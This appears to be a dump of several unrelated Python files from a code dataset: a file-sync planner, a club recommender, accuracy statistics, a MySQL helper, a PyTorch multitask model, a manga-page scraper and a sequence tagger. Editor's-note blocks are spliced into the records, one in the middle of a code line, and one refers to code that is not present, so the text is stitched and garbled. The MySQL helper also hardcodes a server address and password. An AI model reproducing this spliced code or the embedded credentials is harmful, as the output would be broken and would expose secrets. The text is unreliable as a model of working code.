key, from_item in snapshot_from.items():\n if key not in snapshot_to:\n plans.append(('add', key, from_item))\n else:\n to_item = snapshot_to[key]\n if to_item.size != from_item.size or to_item.modified_at != from_item.modified_at:\n plans.append(('update', key, from_item))\n # Remove files\n for key, to_item in 
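Editor's note: the `TypingContext` in the record above re-sends a typing indicator on an interval until the `with` block exits. The same keep-alive shape reduced to the standard library — the `print` stands in for `bot.send_typing(channel)`:

```python
import asyncio

class Heartbeat:
    def __init__(self, interval=1.0):
        self.interval = interval
        self.running = False

    def __enter__(self):
        self.running = True
        asyncio.create_task(self._beat())  # requires a running event loop
        return self

    def __exit__(self, *exc):
        self.running = False               # next wake-up stops the task

    async def _beat(self):
        while self.running:
            print("beat")                  # stand-in for the typing call
            await asyncio.sleep(self.interval)

async def main():
    with Heartbeat(0.2):
        await asyncio.sleep(0.5)           # ~3 beats while the block is open
    await asyncio.sleep(0.3)               # none after exit

asyncio.run(main())
```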
snapshot_to.items():\n if key not in snapshot_from:\n plans.append(('delete', key, to_item))\n return plans\n","sub_path":"canvas_grab/planner.py","file_name":"planner.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"428991400","text":"####### APPLICATION.PY #######\n####### This file runs the application #######\n####### It starts the recommender object, adds the data, and starts the GUI #######\n\nimport recommender\nfrom datetime import datetime\nfrom Interface_Classes import MainWindow\n\n# add data to the interface's recommender object\ndef addData():\n global u1, u2, u3, u4, u5\n\n # create the users\n u1 = recommend.addUser(1)\n u2 = recommend.addUser(2)\n u3 = recommend.addUser(3)\n u4 = recommend.addUser(4)\n u5 = recommend.addUser(5)\n\n # add clubs to the users\n u1.addClub('MuskieTHON', recommend)\n u1.addClub('Computer Science Club', recommend)\n u1.addClub(\"Accounting Society\", recommend)\n\n u2.addClub('MuskieTHON', recommend)\n u2.addClub('A Xavier Christmas', recommend)\n u2.addClub('Computer Science Club', recommend)\n\n u3.addClub('A Xavier Christmas', recommend)\n u3.addClub('4 Paws for Ability at XU', recommend)\n u3.addClub(\"Don't Tell Anna\", recommend)\n\n u4.addClub('A Xavier Christmas', recommend)\n u4.addClub(\"Don't Tell Anna\", recommend)\n u4.addClub('MuskieTHON', recommend)\n\n u5.addClub(\"Computer Science Club\", recommend)\n u5.addClub(\"Don't Tell Anna\", recommend)\n u5.addClub('A Xavier Christmas', recommend)\n\n # add interests to the users\n recommend.addUserInterest(1, \"STEM\")\n recommend.addUserInterest(1, \"General Interests\")\n recommend.addUserInterest(1, \"Spirituality\")\n\n recommend.addUserInterest(2, \"Health Professions\")\n recommend.addUserInterest(2, \"Wellness\")\n recommend.addUserInterest(2, \"Service & Social Justice\")\n\n recommend.addUserInterest(3, \"STEM\")\n recommend.addUserInterest(3, \"General Interests\")\n recommend.addUserInterest(3, \"Wellness\")\n\n recommend.addUserInterest(4, \"Service & Social Justice\")\n recommend.addUserInterest(4, \"Spirituality\")\n recommend.addUserInterest(4, \"STEM\")\n\n # create date objects for the events\n date_1 = datetime(year= 2019, month = 5, day = 25, hour = 19, minute = 0)\n date_1_2 = datetime(year=3020, month = 5, day = 25, hour = 19, minute = 0)\n date_2 = datetime(year= 3020, month = 5, day = 25, hour = 19, minute = 0)\n\n # add events to some clubs\n recommend.addEventToClub(\"Computer Science Club\", \"Event_1\", date_1, \"Alter Hall Rm 101\", \"This is a longer description to play with text wrapping. The first event that is added to the clubs. It should be showing up for CS club.\")\n recommend.addEventToClub(\"Computer Science Club\", \"Event TBD\", date_1_2, \"Alter Hall Rm 101\", \"The description will be available closer to the event. 
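Editor's note: an illustrative run of the `Planner` diff logic above (assuming the class is in scope), with a stand-in item type carrying the two fields it compares, `size` and `modified_at`:

```python
from collections import namedtuple

Item = namedtuple("Item", "size modified_at")

local = {                     # snapshot_from: the state we want to reach
    "a.txt": Item(10, 100),
    "b.txt": Item(20, 200),
}
remote = {                    # snapshot_to: the state we currently have
    "b.txt": Item(20, 150),   # same key, different timestamp -> update
    "c.txt": Item(30, 300),   # absent from local             -> delete
}

planner = Planner(remove_local_file=False)
for action, key, item in planner.plan(local, remote):
    print(action, key, item)
# add a.txt Item(size=10, modified_at=100)
# update b.txt Item(size=20, modified_at=200)
# delete c.txt Item(size=30, modified_at=300)
```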
Please check back a week before the event.\")\n recommend.addEventToClub(\"4 Paws for Ability at XU\", \"Event_2\", date_2, \"Alter Hall Rm 102\", \"Event 2\")\n\n recommend.addEventToClub(\"Don't Tell Anna\", \"Spring Show\", date_2, \"Kennedy Auditorium\", \"Spring Show\")\n recommend.addEventToClub(\"MuskieTHON\", \"Dance Marathon\", date_2, \"GSC\", \"The 24 Hour Dance Marathon\")\n return None\n\n####### START THE PROGRAM #######\n\nrecommend = recommender.Recommender() # starts the recommender object\naddData() # adds the data to the recommender\nMainWindow(recommend) # starts the GUI and drives it\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"133438960","text":"from __future__ import division;\nfrom __future__ import print_function;\nfrom __future__ import absolute_import;\nimport sys;\nimport os;\nscriptsDir = os.environ.get(\"UTIL_SCRIPTS_DIR\");\nif (scriptsDir is None):\n raise Exception(\"Please set environment variable UTIL_SCRIPTS_DIR\");\nsys.path.insert(0,scriptsDir);\nimport pathSetter;\nfrom sets import Set;\nimport copy;\nfrom collections import OrderedDict;\nfrom collections import namedtuple;\nimport sklearn.metrics;\nimport numpy as np;\n\ndef normaliseByRowsAndColumns(theMatrix):\n \"\"\"\n The matrix is as a dictionary\n \"\"\"\n sumEachRow = OrderedDict();\n sumEachColumn = OrderedDict();\n for row in theMatrix:\n sumEachRow[row] = 0;\n for col in theMatrix[row]:\n if col not in sumEachColumn:\n sumEachColumn[col] = 0;\n sumEachRow[row] += theMatrix[row][col];\n sumEachColumn[col] += theMatrix[row][col];\n normalisedConfusionMatrix_byRow = copy.deepcopy(theMatrix);\n normalisedConfusionMatrix_byColumn = copy.deepcopy(theMatrix);\n for row in theMatrix:\n for col in theMatrix[row]:\n normalisedConfusionMatrix_byRow[row][col] = 0 if sumEachRow[row] == 0 else theMatrix[row][col]/sumEachRow[row];\n normalisedConfusionMatrix_byColumn[row][col] = 0 if sumEachColumn[col] == 0 else theMatrix[row][col]/sumEachColumn[col];\n\n return normalisedConfusionMatrix_byRow, normalisedConfusionMatrix_byColumn, sumEachRow, sumEachColumn;\n\nConfusionMatrixStats = namedtuple('ConfusionMatrixStats', ['confusionMatrix', 'normalisedConfusionMatrix_byRow', 'normalisedConfusionMatrix_byColumn', 'sumEachRow', 'sumEachColumn', 'truePositiveRate', 'trueNegativeRate', 'balancedAccuracy', 'overallAccuracy', 'overallBalancedAccuracy', \"majorityClass\"]);\ndef computeConfusionMatrixStats(actual, predictions, labelOrdering=None):\n confusionMatrix = sklearn.metrics.confusion_matrix(actual, predictions);\n sumEachRow=np.sum(confusionMatrix,axis=1);\n sumEachColumn=np.sum(confusionMatrix,axis=0);\n normalisedConfusionMatrix_byRow = confusionMatrix/(sumEachRow[:,None] + 0.000000000000000000000000000000000000000000000000000000000000000001);\n normalisedConfusionMatrix_byColumn = confusionMatrix/(sumEachColumn[None,:]+ 0.00000000000000000000000000000000000000000000000000000000000001);\n #compute accuracy/balanced accuracy\n #accuracy is everything on the diagonal\n correctPredictions=0;\n for i in xrange(confusionMatrix.shape[0]):\n correctPredictions += confusionMatrix[i,i];\n totalExamples = np.sum(sumEachRow);\n overallAccuracy = 0.0 if totalExamples==0 else float(correctPredictions)/totalExamples;\n majorityClass = 0.0 if totalExamples==0 else float(max(sumEachRow))/totalExamples;\n #compute balanced accuracies\n truePositiveRate = 
OrderedDict();\n trueNegativeRate = OrderedDict();\n balancedAccuracy = OrderedDict();\n totalExamples = len(actual);\n for row in xrange(len(confusionMatrix)):\n truePositiveRate[row] = normalisedConfusionMatrix_byRow[row,row];\n trueNegativeRate[row] = (totalExamples - sumEachColumn[row])/(totalExamples - sumEachRow[row]) if (totalExamples-sumEachRow[row]) > 0 else 0.0;\n balancedAccuracy[row] = (truePositiveRate[row] + trueNegativeRate[row])/2;\n overallBalancedAccuracy = 0;\n for row in xrange(len(confusionMatrix)):\n overallBalancedAccuracy += balancedAccuracy[row];\n overallBalancedAccuracy = overallBalancedAccuracy / len(confusionMatrix);\n \n return ConfusionMatrixStats(confusionMatrix, normalisedConfusionMatrix_byRow, normalisedConfusionMatrix_byColumn, sumEachRow, sumEachColumn, truePositiveRate, trueNegativeRate, balancedAccuracy, overallAccuracy, overallBalancedAccuracy, majorityClass); \n \ndef printConfusionMatrix(matrix, isFloat=False):\n print(\"\\t\"+\"\\t\".join(str(x) for x in matrix[matrix.keys()[0]].keys()));\n for row in matrix:\n print(str(row)+\"\\t\"+\"\\t\".join((\"{0:.2f}\".format(x) if isFloat else str(x)) for x in matrix[row].values()));\n\n\n \n\n","sub_path":"util/accuracyStats.py","file_name":"accuracyStats.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"73020057","text":"# __author__ = 'penny'\n# -*- coding:utf-8 -*-\n\nimport pymysql\nfrom utils.readyaml import ReadYaml\nfrom utils.log import Log\n\nclass Mydb:\n '''动作类,获取数据库连接,配置数据库IP,端口等信息,获取数据库连接'''\n\n def __init__(self,mysql_config_file):\n config = ReadYaml(mysql_config_file).getValue()\n self.host = config['TESTDB']['host']\n self.port = config['TESTDB']['port']\n self.user = config['TESTDB']['user']\n self.passwd = config['TESTDB']['passwd']\n self.db = config['TESTDB']['db']\n self.charset = config['TESTDB']['charset']\n try:\n self.connect = pymysql.Connect(\n host=self.host,\n port=self.port,\n user=self.user,\n passwd=self.passwd,\n db=self.db\n # charser=self.charset\n )\n except Exception as e:\n self.my_print('数据库初始化连接失败:{0}'.format(e))\n raise\n\n def my_print(self,msg):\n '''打印日志'''\n self.logger = Log()\n self.logger.info(msg)\n\n def get_conn(self):\n '''连接数据库'''\n return self.connect\n\n def execute_create(self,query):\n '''执行sql语句:create'''\n self.my_print('query:{0}'.format(query))\n try:\n cur = self.connect.cursor()\n cur.execute(query)\n cur.close()\n self.connect.commit()\n self.connect.close()\n except Exception as e:\n self.my_print('创建数据库表操作失败:{0}'.format(e))\n self.connect.rollback()\n self.connect.close()\n raise\n\n def execute_insert(self,query,data):\n '''执行sql语句:insert'''\n self.my_print('query:{0} , data: {1}'.format(query,data))\n try:\n cur = self.connect.cursor()\n cur.execute(query)\n cur.close()\n self.connect.commit()\n self.connect.close()\n except Exception as e:\n self.my_print('插入数据库表操作失败:{0}'.format(e))\n self.connect.rollback()\n self.connect.close()\n raise\n\n\n def execute_update(self,query):\n '''执行sql语句:update'''\n self.my_print('query:{0}'.format(query))\n try:\n cur = self.connect.cursor()\n cur.execute(query)\n cur.close()\n self.connect.commit()\n self.connect.close()\n except Exception as e:\n self.my_print('更新数据库表操作失败:{0}'.format(e))\n self.connect.rollback()\n self.connect.close()\n raise\n\n def excute_select_one_record(self,query):\n '''执行sql语句:select,返回结果只包含一条数据'''\n self.my_print('query:{0}'.format(query))\n try:\n cur = 
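Editor's note: the stats function above approximates the per-class true-negative rate as `(total - column sum) / (total - row sum)`, which can exceed 1 because the numerator also counts that class's false negatives. The textbook rate counts true negatives explicitly; a compact NumPy recomputation on made-up labels:

```python
import numpy as np
from sklearn.metrics import confusion_matrix

actual = [0, 0, 1, 1, 2, 2, 2, 0]
pred   = [0, 1, 1, 1, 2, 0, 2, 0]

cm = confusion_matrix(actual, pred)
n = cm.sum()
row_sums = cm.sum(axis=1)        # actual count per class
col_sums = cm.sum(axis=0)        # predicted count per class
tp = np.diag(cm)

tpr = tp / row_sums                        # sensitivity (recall) per class
tn = n - row_sums - col_sums + tp          # true negatives per class
tnr = tn / (n - row_sums)                  # specificity: TN / (TN + FP)

print("TPR:", tpr.round(3))
print("TNR:", tnr.round(3))
print("balanced accuracy per class:", ((tpr + tnr) / 2).round(3))
```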
self.connect.cursor()\n cur.execute(query)\n return cur.fetchone()\n except Exception as e:\n self.my_print('查询数据库表操作失败:{0}'.format(e))\n self.connect.close()\n raise\n\n def excute_select_many_record(self,query):\n '''执行sql语句:select,返回结果包含多条数据'''\n self.my_print('query:{0}'.format(query))\n try:\n cur = self.connect.cursor()\n cur.execute(query)\n return cur.fetchall()\n except Exception as e:\n self.my_print('查询数据库表操作失败:{0}'.format(e))\n self.connect.close()\n raise\n\n def close(self):\n '''关闭'''\n self.connect.cursor().close()\n self.connect.commit()\n self.connect.close()\n\nif __name__ == '__main__':\n sql = 'SELECT count(case_id) FROM test_data'\n db = Mydb('../config/dbconfig.yaml')\n db.excute_select_one_record('SELECT count(case_id) FROM test_data')\n conn = pymysql.Connect(host='10.122.74.230', port=3306, user='root', passwd='infobird123', database='testdb')\n","sub_path":"utils/mydb.py","file_name":"mydb.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"363275474","text":"# CDFarm_3outputs+classification_torch\r\n#%% \r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom torch.utils.data import DataLoader, Dataset\r\nfrom torch.autograd import Variable\r\nimport torch.optim as optim\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits import mplot3d\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\nfrom sklearn.metrics import r2_score # for regression\r\nfrom sklearn.metrics import roc_auc_score, roc_curve, auc\r\nfrom hyperopt import fmin, tpe, hp\r\nimport pickle\r\nimport os\r\nimport sys\r\nimport hyperopt.pyll.stochastic\r\n#%%\r\n### see how data looks like\r\n# df = pd.read_excel(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_train.xlsx', header = 0)\r\n# df_array = df.to_numpy()\r\n\r\n# for i in range(3, 8):\r\n# fig = plt.figure()\r\n# ax = fig.add_subplot(111, projection='3d')\r\n# x = df_array[:, 0]\r\n# y = df_array[:, 1]\r\n# z = df_array[:, 2]\r\n\r\n# c = df_array[:, i] \r\n\r\n# img = ax.scatter(x, y, z, c=c, cmap='viridis', alpha=0.5)\r\n\r\n# plt.title(str('y'+ str(i)))\r\n\r\n# plt.xlabel('x1')\r\n# plt.ylabel('x2')\r\n# plt.ylabel('x3')\r\n\r\n# fig.colorbar(img)\r\n# plt.show()\r\n#%%\r\ndef datapreparation(file_path):\r\n\r\n df = pd.read_excel(file_path, header = 0)\r\n df_array = df.to_numpy() # first transform df to numpy array \r\n\r\n # Access features and normalize them\r\n x = torch.from_numpy(df_array[:, 0:3]) # transform numpy array to tensors # prices of barley, rapeseed, wheat \r\n picklename = \"scaling_metrics_01.pkl\"\r\n if not os.path.exists(picklename):\r\n x_mean = torch.mean(x)\r\n x_sd = torch.sqrt(torch.var(x))\r\n export = (x_mean,x_sd)\r\n pickle.dump( export, open( picklename, \"wb\" ) )\r\n elif os.path.exists(picklename):\r\n (x_mean,x_sd) = pickle.load( open( picklename, \"rb\" ) )\r\n else:\r\n print(\"Error in Scaling Metrics\")\r\n sys.exit()\r\n\r\n x = (x - x_mean)/x_sd # normalization\r\n\r\n # Access lables and normalize y1-y4\r\n y_reg = torch.from_numpy(df_array[:, 3:7]) # get data of y1-y4\r\n y_reg = (y_reg - torch.min(y_reg)) / (torch.max(y_reg) - torch.min(y_reg)) \r\n y_cla = torch.from_numpy(df_array[:, 7]).reshape(y_reg.shape[0],1) # get data of y5\r\n y = torch.cat((y_reg, y_cla), 1) \r\n \r\n print('Type and shape of x', x.type, x.shape)\r\n 
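Editor's note: `execute_insert` in the record above receives a `data` argument but executes the bare query string. pymysql binds parameters when they are passed to `execute()`, which also keeps values safely escaped. A minimal sketch — the table and column names are illustrative:

```python
import pymysql

def insert_row(connect, case_id, case_name):
    query = "INSERT INTO test_data (case_id, case_name) VALUES (%s, %s)"
    try:
        with connect.cursor() as cur:
            cur.execute(query, (case_id, case_name))  # driver-side binding
        connect.commit()
    except Exception:
        connect.rollback()
        raise
```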
print('Type and shape of y', y.type, y.shape)\r\n return [x, y]\r\n\r\ntrain_file = datapreparation(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_train.xlsx')\r\nvalidation_file = datapreparation(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_validation.xlsx')\r\ntest_file = datapreparation(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_test.xlsx')\r\nprint(train_file[0]) # outcome of the datapreparation function X\r\nprint(train_file[1]) # outcome of the datapreparation function y\r\n \r\n#%%\r\n# create a class for custom dataloader\r\nclass DatasetCDFarm(Dataset): \r\n\r\n def __init__(self, file):\r\n \r\n self.x = file[0] \r\n self.y = file[1] \r\n \r\n # print('x:',self.x)\r\n # print('y:', self.y)\r\n \r\n print('shape of x: ', self.x.shape)\r\n print('shape of y: ', self.y.shape)\r\n \r\n # PyTorch gives you the freedom to pretty much do anything with the Dataset class,\r\n # so long as you override two of the subclass functions: \r\n\r\n def __getitem__(self, index): \r\n # returns the data and labels \r\n return self.x[index], self.y[index]\r\n\r\n def __len__(self): \r\n # return the size of the dataset, so that torch can divide data into batches\r\n self.len = self.x.shape[0]\r\n return self.len\r\n\r\n# Load train, validation and test data\r\ntrain_dataset = DatasetCDFarm(train_file)\r\ntrain_loader = DataLoader(dataset=train_dataset, \r\n batch_size = 4, \r\n shuffle = True) \r\nvalidation_dataset = DatasetCDFarm(validation_file)\r\nvalidation_loader = DataLoader(dataset=validation_dataset, \r\n batch_size = len(validation_dataset)) \r\ntest_dataset = DatasetCDFarm(test_file)\r\ntest_loader = DataLoader(dataset=test_dataset, batch_size=len(test_dataset)) \r\n\r\n\r\n\r\n#%%\r\n# create Net class: construct the Neural Network\r\nclass Net(nn.Module): \r\n #class initialization \r\n\r\n def __init__(self, input_size, hidden1_size, hidden2_size, output_size): \r\n super(Net, self).__init__() # super fconstructor creates an instance of the base nn.Module \r\n \r\n self.fc1 = nn.Linear(input_size, hidden1_size) # first hidden layer\r\n self.relu1 = nn.ReLU()\r\n self.fc2 = nn.Linear(hidden1_size, hidden2_size) # output layer\r\n self.relu2 = nn.ReLU()\r\n self.fc3 = nn.Linear(hidden2_size, output_size)\r\n #define how data flows in this network, needs to be defined for each network\r\n def forward(self, x):\r\n # pass data through the net\r\n out1 = self.fc1(x)\r\n out2 = self.relu1(out1)\r\n out3 = self.fc2(out2) \r\n out4 = self.relu2(out3)\r\n out5 = self.fc3(out4)\r\n out_reg = out5[:, 0:4] # y1-y4 regression problem, y5 is classification problem \r\n out_cla1 = torch.sigmoid(out5[:, 4]).reshape(out5.shape[0],1) # transform y5 with sigmoid function \r\n # out_cla2 = out_cla1 #(out_cla1>0.5).float()\r\n out = torch.cat((out_reg, out_cla1), 1)\r\n return out\r\n \r\n# print this network architecture:\r\nMyNet = Net(3, 90, 50, 5)\r\nprint(MyNet)\r\n\r\n\r\n#%%\r\ndef train(epochs, train_loader, validation_loader, MyNet, optimizer, criterion1, criterion2):\r\n \r\n Train_Losses = [] # empty list to store train losses through epochs\r\n Val_Losses = [] # empty list to store validation losses through epochs\r\n \r\n for epoch in range(epochs):\r\n train_loss = 0.0\r\n validation_loss = 0.0\r\n \r\n MyNet.train()\r\n for batch_id, data in enumerate(train_loader):\r\n optimizer.zero_grad() \r\n inputs, labels = data\r\n inputs = Variable(inputs).float()\r\n 
labels = Variable(labels).float()\r\n # print('train inputs:', inputs)\r\n # print('train labels:', labels)\r\n out = MyNet(inputs)\r\n # print('train out:', out)\r\n\r\n out_reg, labels_reg = out[:, 0:4], labels[:, 0:4]\r\n out_cla, labels_cla = out[:, 4], labels[:, 4]\r\n\r\n loss_reg = criterion1(out_reg, labels_reg)\r\n loss_cla = criterion2(out_cla, labels_cla)\r\n # print('Regression loss: ', loss_reg)\r\n # print('Classification loss: ', loss_cla)\r\n\r\n loss = loss_reg * 1000 + loss_cla # loss function\r\n loss.backward()\r\n optimizer.step()\r\n train_loss += loss.item()\r\n train_loss /= len(train_loader) \r\n Train_Losses.append(train_loss) # store train_loss to Train_Losses\r\n\r\n MyNet.eval()\r\n for data in validation_loader:\r\n inputs, labels = data\r\n inputs = Variable(inputs).float()\r\n labels = Variable(labels).float()\r\n out = MyNet(inputs)\r\n #print('validation out:', out)\r\n\r\n out_reg, labels_reg = out[:, 0:4], labels[:, 0:4]\r\n out_cla, labels_cla = out[:, 4], labels[:, 4]\r\n\r\n loss_reg = criterion1(out_reg, labels_reg)\r\n loss_cla = criterion2(out_cla, labels_cla)\r\n \r\n loss = loss_reg * 1000 + loss_cla\r\n validation_loss += loss.item()\r\n validation_loss /= len(validation_loader) \r\n Val_Losses.append(validation_loss) # # store validation_loss to Val_Losses\r\n\r\n print(\"Epoch: {}/{}..\".format(epoch+1, epochs),\r\n \"Training loss: {:.3f}..\".format(train_loss/len(train_loader)),\r\n \"Validation loss: {:.3f}..\".format(validation_loss/len(validation_loader)))\r\n \r\n plt.plot(Train_Losses, label='Training losses')\r\n plt.plot(Val_Losses, label='Validation losses')\r\n plt.legend()\r\n plt.show()\r\n\r\n\r\n return MyNet\r\n#%%\r\ndef test(test_loader, criterion1, criterion2):\r\n MyNet.eval()\r\n loss = 0\r\n for inputs, labels in test_loader:\r\n inputs = Variable(inputs).float() # or inputs = Variable(torch.FloatTensor(inputs)) \r\n labels = Variable(labels).float()\r\n # print('labels:', labels)\r\n out = MyNet(inputs)\r\n # print('out:', out)\r\n out_reg, labels_reg = out[:, 0:4], labels[:, 0:4]\r\n out_cla, labels_cla = out[:, 4], labels[:, 4]\r\n\r\n loss_reg = criterion1(out_reg, labels_reg)\r\n loss_cla = criterion2(out_cla, labels_cla)\r\n\r\n \r\n loss = loss_reg * 1000 + loss_cla\r\n loss += loss.item()\r\n # print('loss:', loss)\r\n\r\n pred_reg=out_reg.data.numpy()\r\n pred_cla=out_cla.data.numpy()\r\n r2 = r2_score(pred_reg, labels_reg)\r\n \r\n\r\n fpr, tpr, thresholds = roc_curve(labels_cla, pred_cla, pos_label=0)\r\n # Print ROC curve\r\n plt.plot(fpr,tpr)\r\n plt.show() \r\n # Print AUC\r\n auc = np.trapz(tpr,fpr)\r\n \r\n\r\n Average_loss = loss/len(test_loader.dataset)\r\n print(\"Average loss:\", Average_loss)\r\n print('Square rooted loss:', torch.sqrt(loss))\r\n print('R squared:', r2)\r\n print('AUC:', auc) # good auc should be close to 1 \r\n#%%\r\n\r\n#%%\r\ndef main():\r\n\r\n criterion1 = nn.MSELoss()\r\n criterion2 = nn.BCELoss()\r\n optimizer = optim.Adam(MyNet.parameters(), lr=0.01)\r\n epochs = 20\r\n\r\n train(epochs, train_loader, validation_loader, MyNet, optimizer, criterion1, criterion2)\r\n \r\n \r\n # space={\r\n # 'lr': hp.uniform('lr', 0, 1),\r\n # 'hidden1_size': hp.quniform('hidden1_size', 50,100,1),\r\n # 'hidden2_size': hp.quniform('hidden2_size', 50,100,1)\r\n # }\r\n\r\n # # for i in range(10):\r\n # # sample = hyperopt.pyll.stochastic.sample(space)\r\n # # print(sample)\r\n\r\n # best = fmin(\r\n # fn= objective,\r\n # space = space,\r\n # algo=tpe.suggest,\r\n # max_evals=10)\r\n # 
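Editor's note: the training loop above balances the two objectives with a hard-coded weight (`loss_reg * 1000 + loss_cla`). A small helper makes the weight explicit and tunable; the tensors below are dummies just to show the shapes involved:

```python
import torch
import torch.nn as nn

mse, bce = nn.MSELoss(), nn.BCELoss()

def multitask_loss(out, labels, reg_weight=1000.0):
    # columns 0-3 are regression targets, column 4 is a sigmoid probability
    loss_reg = mse(out[:, 0:4], labels[:, 0:4])
    loss_cla = bce(out[:, 4], labels[:, 4])
    return reg_weight * loss_reg + loss_cla

out = torch.rand(8, 5)      # stand-in network output (col 4 already in [0, 1])
labels = torch.rand(8, 5)   # BCE targets must lie in [0, 1]
print(multitask_loss(out, labels))
```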
print(best)\r\n\r\n # params = {'hidden1_size': best['hidden1_size'], 'hidden2_size': best['hidden2_size'], 'lr': best['lr']}\r\n # print(params)\r\n # objective(params)\r\n\r\n test(test_loader, criterion1, criterion2)\r\n\r\n print('model is trained')\r\n\r\n#%%\r\nmain()\r\n\r\n#%%\r\n# Construct our loss function and an Optimizer. The call to model.parameters()\r\n\r\n\r\n# loss_values = [] \r\n\r\n# for epoch in range(epochs):\r\n# cum_loss = 0\r\n \r\n# MyNet.train()\r\n# for batch_id, data in enumerate(train_loader):\r\n# # get the inputs\r\n# inputs, labels = data\r\n\r\n# # wrap them in Variable\r\n# inputs = Variable(inputs).float()\r\n# labels = Variable(labels).float()\r\n\r\n# # print(epoch, batch_id, \"inputs\", inputs.data, \"labels\", labels.data)\r\n# # Forward pass\r\n \r\n# out = MyNet(inputs)\r\n# # print('out', type(out),out)\r\n# # print('labels', type(labels),labels)\r\n\r\n# loss1 = criterion1(out[:, 0:4], labels[:, 0:4])\r\n# loss2 = criterion2(out[:, 4], labels[:, 4])\r\n\r\n# loss = loss1 + 0.1*loss2\r\n# print(epoch, batch_id, loss.data)\r\n# cum_loss += loss.data\r\n\r\n# # Zero gradients, perform a backward pass, and update the weights\r\n# optimizer.zero_grad()\r\n# loss.backward()\r\n# optimizer.step()\r\n\r\n# loss_values.append(cum_loss/len(train_dataset))\r\n\r\n# plt.plot(loss_values)\r\n\r\n\r\n# #%%\r\n\r\n# test_dataset = DatasetCDFarm(r'N:\\agpo\\work1\\Shang\\ForPyomoBook\\MLmodel\\nn_CDFarm_torch_multiobj+classification_test.xlsx')\r\n# test_loader = DataLoader(dataset=test_dataset) \r\n# #%%\r\n# def test():\r\n# MyNet.eval()\r\n# loss = 0\r\n# for inputs, labels in test_loader:\r\n# inputs = Variable(inputs).float()\r\n# labels = Variable(labels).float()\r\n# print('labels:', labels)\r\n# out = MyNet(inputs)\r\n# print('out:', out)\r\n\r\n# loss1 = criterion1(out[:, 0:4], labels[:, 0:4])\r\n# loss2 = criterion2(out[:, 4], labels[:, 4])\r\n# loss = loss1 + 0.1*loss2\r\n\r\n# loss += loss.item()\r\n# print('loss:', loss)\r\n# Average_loss = loss/len(test_loader.dataset)\r\n# print(\"Average loss:\", Average_loss)\r\n\r\n# test()\r\n\r\n# print('Square rooted loss:', torch.sqrt(loss))\r\n\r\n\r\n#%%\r\n","sub_path":"CDFarm_3outputs+classification.py","file_name":"CDFarm_3outputs+classification.py","file_ext":"py","file_size_in_byte":12525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"404735569","text":"from bs4 import BeautifulSoup\nimport os\nimport requests\n\nlink = 'https://ww5.readsnk.com/chapter/shingeki-no-kyojin-chapter-000'\n\nfor i in range(112):\n if (i<9):\n num= link[-1:]\n num=int(num)\n num+=1\n link= link[:-1]+str(num)\n elif(i>=9 and i<99):\n num= link[-2:]\n num=int(num)\n num+=1\n link= link[:-2]+str(num)\n elif(i>=99 and i<110):\n num= link[-3:]\n num=int(num)\n num+=1\n link= link[:-3]+str(num)\n try:\n os.mkdir('Chapter '+str(i+1))\n os.chdir('./'+'Chapter '+str(i+1))\n response = requests.get(link)\n page = BeautifulSoup(response.text,'html.parser')\n images = page.find_all('img',{\n 'class': 'pages__img'\n })\n\n \n for index,img in enumerate(images,start=1):\n image= requests.get(img.get('src'))\n name=str(index)+'.png'\n with open(name,'wb') as f:\n f.write(image.content)\n\n os.chdir('..')\n except FileExistsError:\n print('chapter ' + str(i+1)+' already exists')\n \n \n\n \n\n \n\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} 
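Editor's note: `test()` above integrates the ROC curve by hand with `np.trapz`; `sklearn.metrics.roc_auc_score` gives the same number directly. Shown on made-up scores — and since the file passes `pos_label=0`, class 0 is treated as positive, so the truth vector must be flipped accordingly:

```python
import numpy as np
from sklearn.metrics import roc_auc_score, roc_curve

labels = np.array([0, 0, 1, 1, 0, 1])
scores = np.array([0.9, 0.8, 0.3, 0.2, 0.6, 0.4])   # high score => class 0

fpr, tpr, _ = roc_curve(labels, scores, pos_label=0)
print(np.trapz(tpr, fpr))                   # manual integration, as in test()
print(roc_auc_score(labels == 0, scores))   # same value from sklearn
```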
+{"seq_id":"310914524","text":"from lstm_crf_tagger import LSTM_CRF_Tagger\r\n\r\nclass LSTM_CRF_Tagger_CoNLL2000(LSTM_CRF_Tagger):\r\n \r\n def __init__(self,\r\n train_path,\r\n model_name,\r\n max_length,\r\n embedding_dim,\r\n epochs,\r\n batch_size,\r\n mask,\r\n n_gpu=None):\r\n super(LSTM_CRF_Tagger_CoNLL2000, self).__init__(\r\n train_path=train_path,\r\n model_name=model_name,\r\n max_length=max_length,\r\n embedding_dim=embedding_dim,\r\n epochs=epochs,\r\n batch_size=batch_size,\r\n mask=mask,\r\n n_gpu=n_gpu\r\n )\r\n \r\n def load_file(self, file_name):\r\n print('=' * 70)\r\n print('Loading files...')\r\n with open(file_name, \"r\") as f:\r\n lines = f.readlines()\r\n idx_list = [i + 1 for i, v in enumerate(lines) if v == '\\n']\r\n sentences = []\r\n words = set()\r\n pos_tags = set()\r\n ner_tags = set()\r\n for i, j in zip([0] + idx_list, idx_list + (\r\n [len(lines)] if idx_list[-1] != len(lines) else [])):\r\n sentence = []\r\n for line in lines[i: j - 